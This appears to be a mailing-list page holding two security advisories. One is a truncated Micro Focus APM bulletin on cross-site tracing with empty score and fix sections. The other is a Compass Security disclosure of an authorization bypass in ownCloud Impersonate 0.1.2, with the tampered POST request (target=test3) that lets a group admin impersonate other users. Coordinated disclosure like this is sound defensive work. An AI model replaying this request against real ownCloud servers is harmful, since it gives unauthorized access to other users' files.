Release Date: 2018-08-29
Last Updated: 2018-08-29

Potential Security Impact: Remote: Disclosure of Information

Source: Micro Focus, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in Micro Focus
Application Performance Management. The vulnerability could be remotely
exploited to remote cross-site tracing and Remote Disclosure of Information.

References:

  - PSRT110566
  - CVE-2007-3008
  - CVE-2004-2320

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Application Performance Management (APM) 9.25,9.26, 9.30, 9.40,9.50

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector


RESOLUTION

Microfocus has made the following software updates and mitigation information
to resolve the vulnerability in Application Performance Management, please go
to the link below:


HISTORY
Version:1 (rev.1) - 29 August 2018 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on
systems running Micro Focus products should be applied in accordance with the 
customer's
patch management policy.

Support: For issues about implementing the recommendations of this Security 
Bulletin, contact normal Micro Focus services support channel.
For other issues about the content of this Security Bulletin, send e-mail to  
cyber-p...@microfocus.com.

Report: To report a potential security vulnerability for any supported product:
  Web form: https://www.microfocus.com/support-and-services/report-security
  Email: secur...@microfocus.com

Subscribe:
 To initiate receiving subscriptions for future Micro Focus Security Bulletin 
alerts via Email,  please subscribe here - 
https://softwaresupport.hpe.com/group/softwaresupport/email-notification/-/subscriptions/registerdocumentnotification
 Once you are logged in to the portal, please choose security bulletins under 
product and document types.
 Please note that you will need to sign in using a Passport account. If you do 
not have a Passport account yet, you can create one- its free and easy 
https://cf.passport.softwaregrp.com/hppcf/createuser.do

Security Bulletin Archive:
 A list of recently released Security Bulletins is available here: 
https://softwaresupport.hpe.com/security-vulnerability
 
Software Product Category: The Software Product Category is represented in
the title by the two characters following Micro Focus Security Bulletin.

3P = 3rd Party Software
GN = Micro Focus General Software
MU = Multi-Platform Software

System management and security procedures must be reviewed frequently to 
maintain system integrity.
Micro Focus is continually reviewing and enhancing the security features of 
software products to provide
customers with current secure solutions.

"Micro Focus is broadly distributing this Security Bulletin in order to bring 
to the attention of users of the
affected Micro Focus products the important security information contained in 
this Bulletin. Micro Focus recommends
that all users determine the applicability of this information to their 
individual situations and take appropriate action.
Micro Focus does not warrant that this information is necessarily accurate or 
complete for all user situations and, consequently,
Micro Focus will not be responsible for any damages resulting from user's use 
or disregard of the information provided in
this Security Bulletin. To the extent permitted by law, Micro Focus  disclaims  
all warranties, either express or
implied, including the warranties of merchantability and fitness for a 
particular purpose, title and non-infringement."


Copyright 2017 EntIT Software LLC

Micro Focus shall not be liable for technical or editorial errors or omissions 
contained herein.
The information provided is provided "as is" without warranty of any kind. To 
the extent permitted by law,
neither Micro Focus nor its affiliates, subcontractors or suppliers will be 
liable for incidental, special
or consequential damages including downtime cost; lost profits; damages 
relating to the procurement of
substitute products or services; or damages for loss of data, or software 
restoration.
The information in this document is subject to change without notice. Micro 
Focus and the names of
Micro Focus products referenced herein are trademarks of Micro Focus in the 
United States and other

CSNC-2018-015 - ownCloud Impersonate - Authorization Bypass

2018-08-30 Thread Advisories 
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  ownCloud Impersonate
# Vendor:   ownCloud
# CSNC ID:  CSNC-2018-015
# CVE ID:   N/A
# Subject:  Authorization bypass
# Risk: High
# Effect:   Remotely exploitable
# Author:   Thierry Viaccoz 
# Date: 29.08.2018
#
#


Introduction:
-
ownCloud [1] is a suite of client-server software for creating file hosting 
services and using them. An app called Impersonate [2] was created to allow 
administrators to impersonate other users.

According to the documentation [3], group admins should only be able to access 
users of the groups they are administrator of.

Compass Security discovered that it was possible for a group admin to 
impersonate any user, except global administrators.

This way, group admins have access to data of users of other groups, even 
though they shouldn't.


Affected:
-
Vulnerable:
 * Version 0.1.2

Not vulnerable:
 * Version 0.2.0

No other version was tested, but it is believed for the older versions to be 
vulnerable too.


Technical Description
-
In order to reproduce the vulnerability, follow the steps below.

Create two groups:
 * group1
 * group2

Create four users as follows:
 * test1; group = group1; group admin = group1
 * test2; group = group1; group admin = no group
 * test3; group = group2; group admin = group2
 * test4; group = group2; group admin = no group

Activate the Impersonate app in Settings > Admin > Apps.

Go to Settings > Admin > Apps > User Authentication, check "Allow group admins 
to impersonate users from these groups" and add the two groups "group1" and 
"group2".

Log in with "test1", open the user page and impersonate the user "test2". 
There, intercept the POST request to /apps/impersonate/user and replace 
"target=test2" by "target=test3" in the body as shown below.

As a result, the user "test1" will impersonate the user "test3", even though 
"test1" is only group admin of "group1" and "test3" is not in this group.

Request:
=
POST /apps/impersonate/user HTTP/1.1
Host: demo.owncloud.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken: [CUT]
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 12
Cookie: [CUT]
Connection: close

target=test3
=

Response:
=
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Length: 2
Content-Security-Policy: default-src 'none';manifest-src 'self';script-src 
'self' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: 
blob:;font-src 'self';connect-src 'self';media-src 'self'
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Mar 2018 15:21:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Strict-Transport-Security: max-age=15768000; preload
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: none
X-Xss-Protection: 1; mode=block
Connection: close

[]
=


Workaround / Fix:
-
Check the authorization consistently to prevent group admins to be able to 
impersonate users from other groups.


Timeline:
-
2018-08-29: Coordinated public disclosure date
2018-04-17: Release of fixed version 0.2.0
2018-03-16: Initial vendor response
2018-03-16: Initial vendor notification
2018-03-15: Discovery by Thierry Viaccoz


References:
---
[1] https://owncloud.org/
[2] https://marketplace.owncloud.com/apps/impersonate
[3] 
https://doc.owncloud.org/server/10.0/admin_manual/issues/impersonate_users.html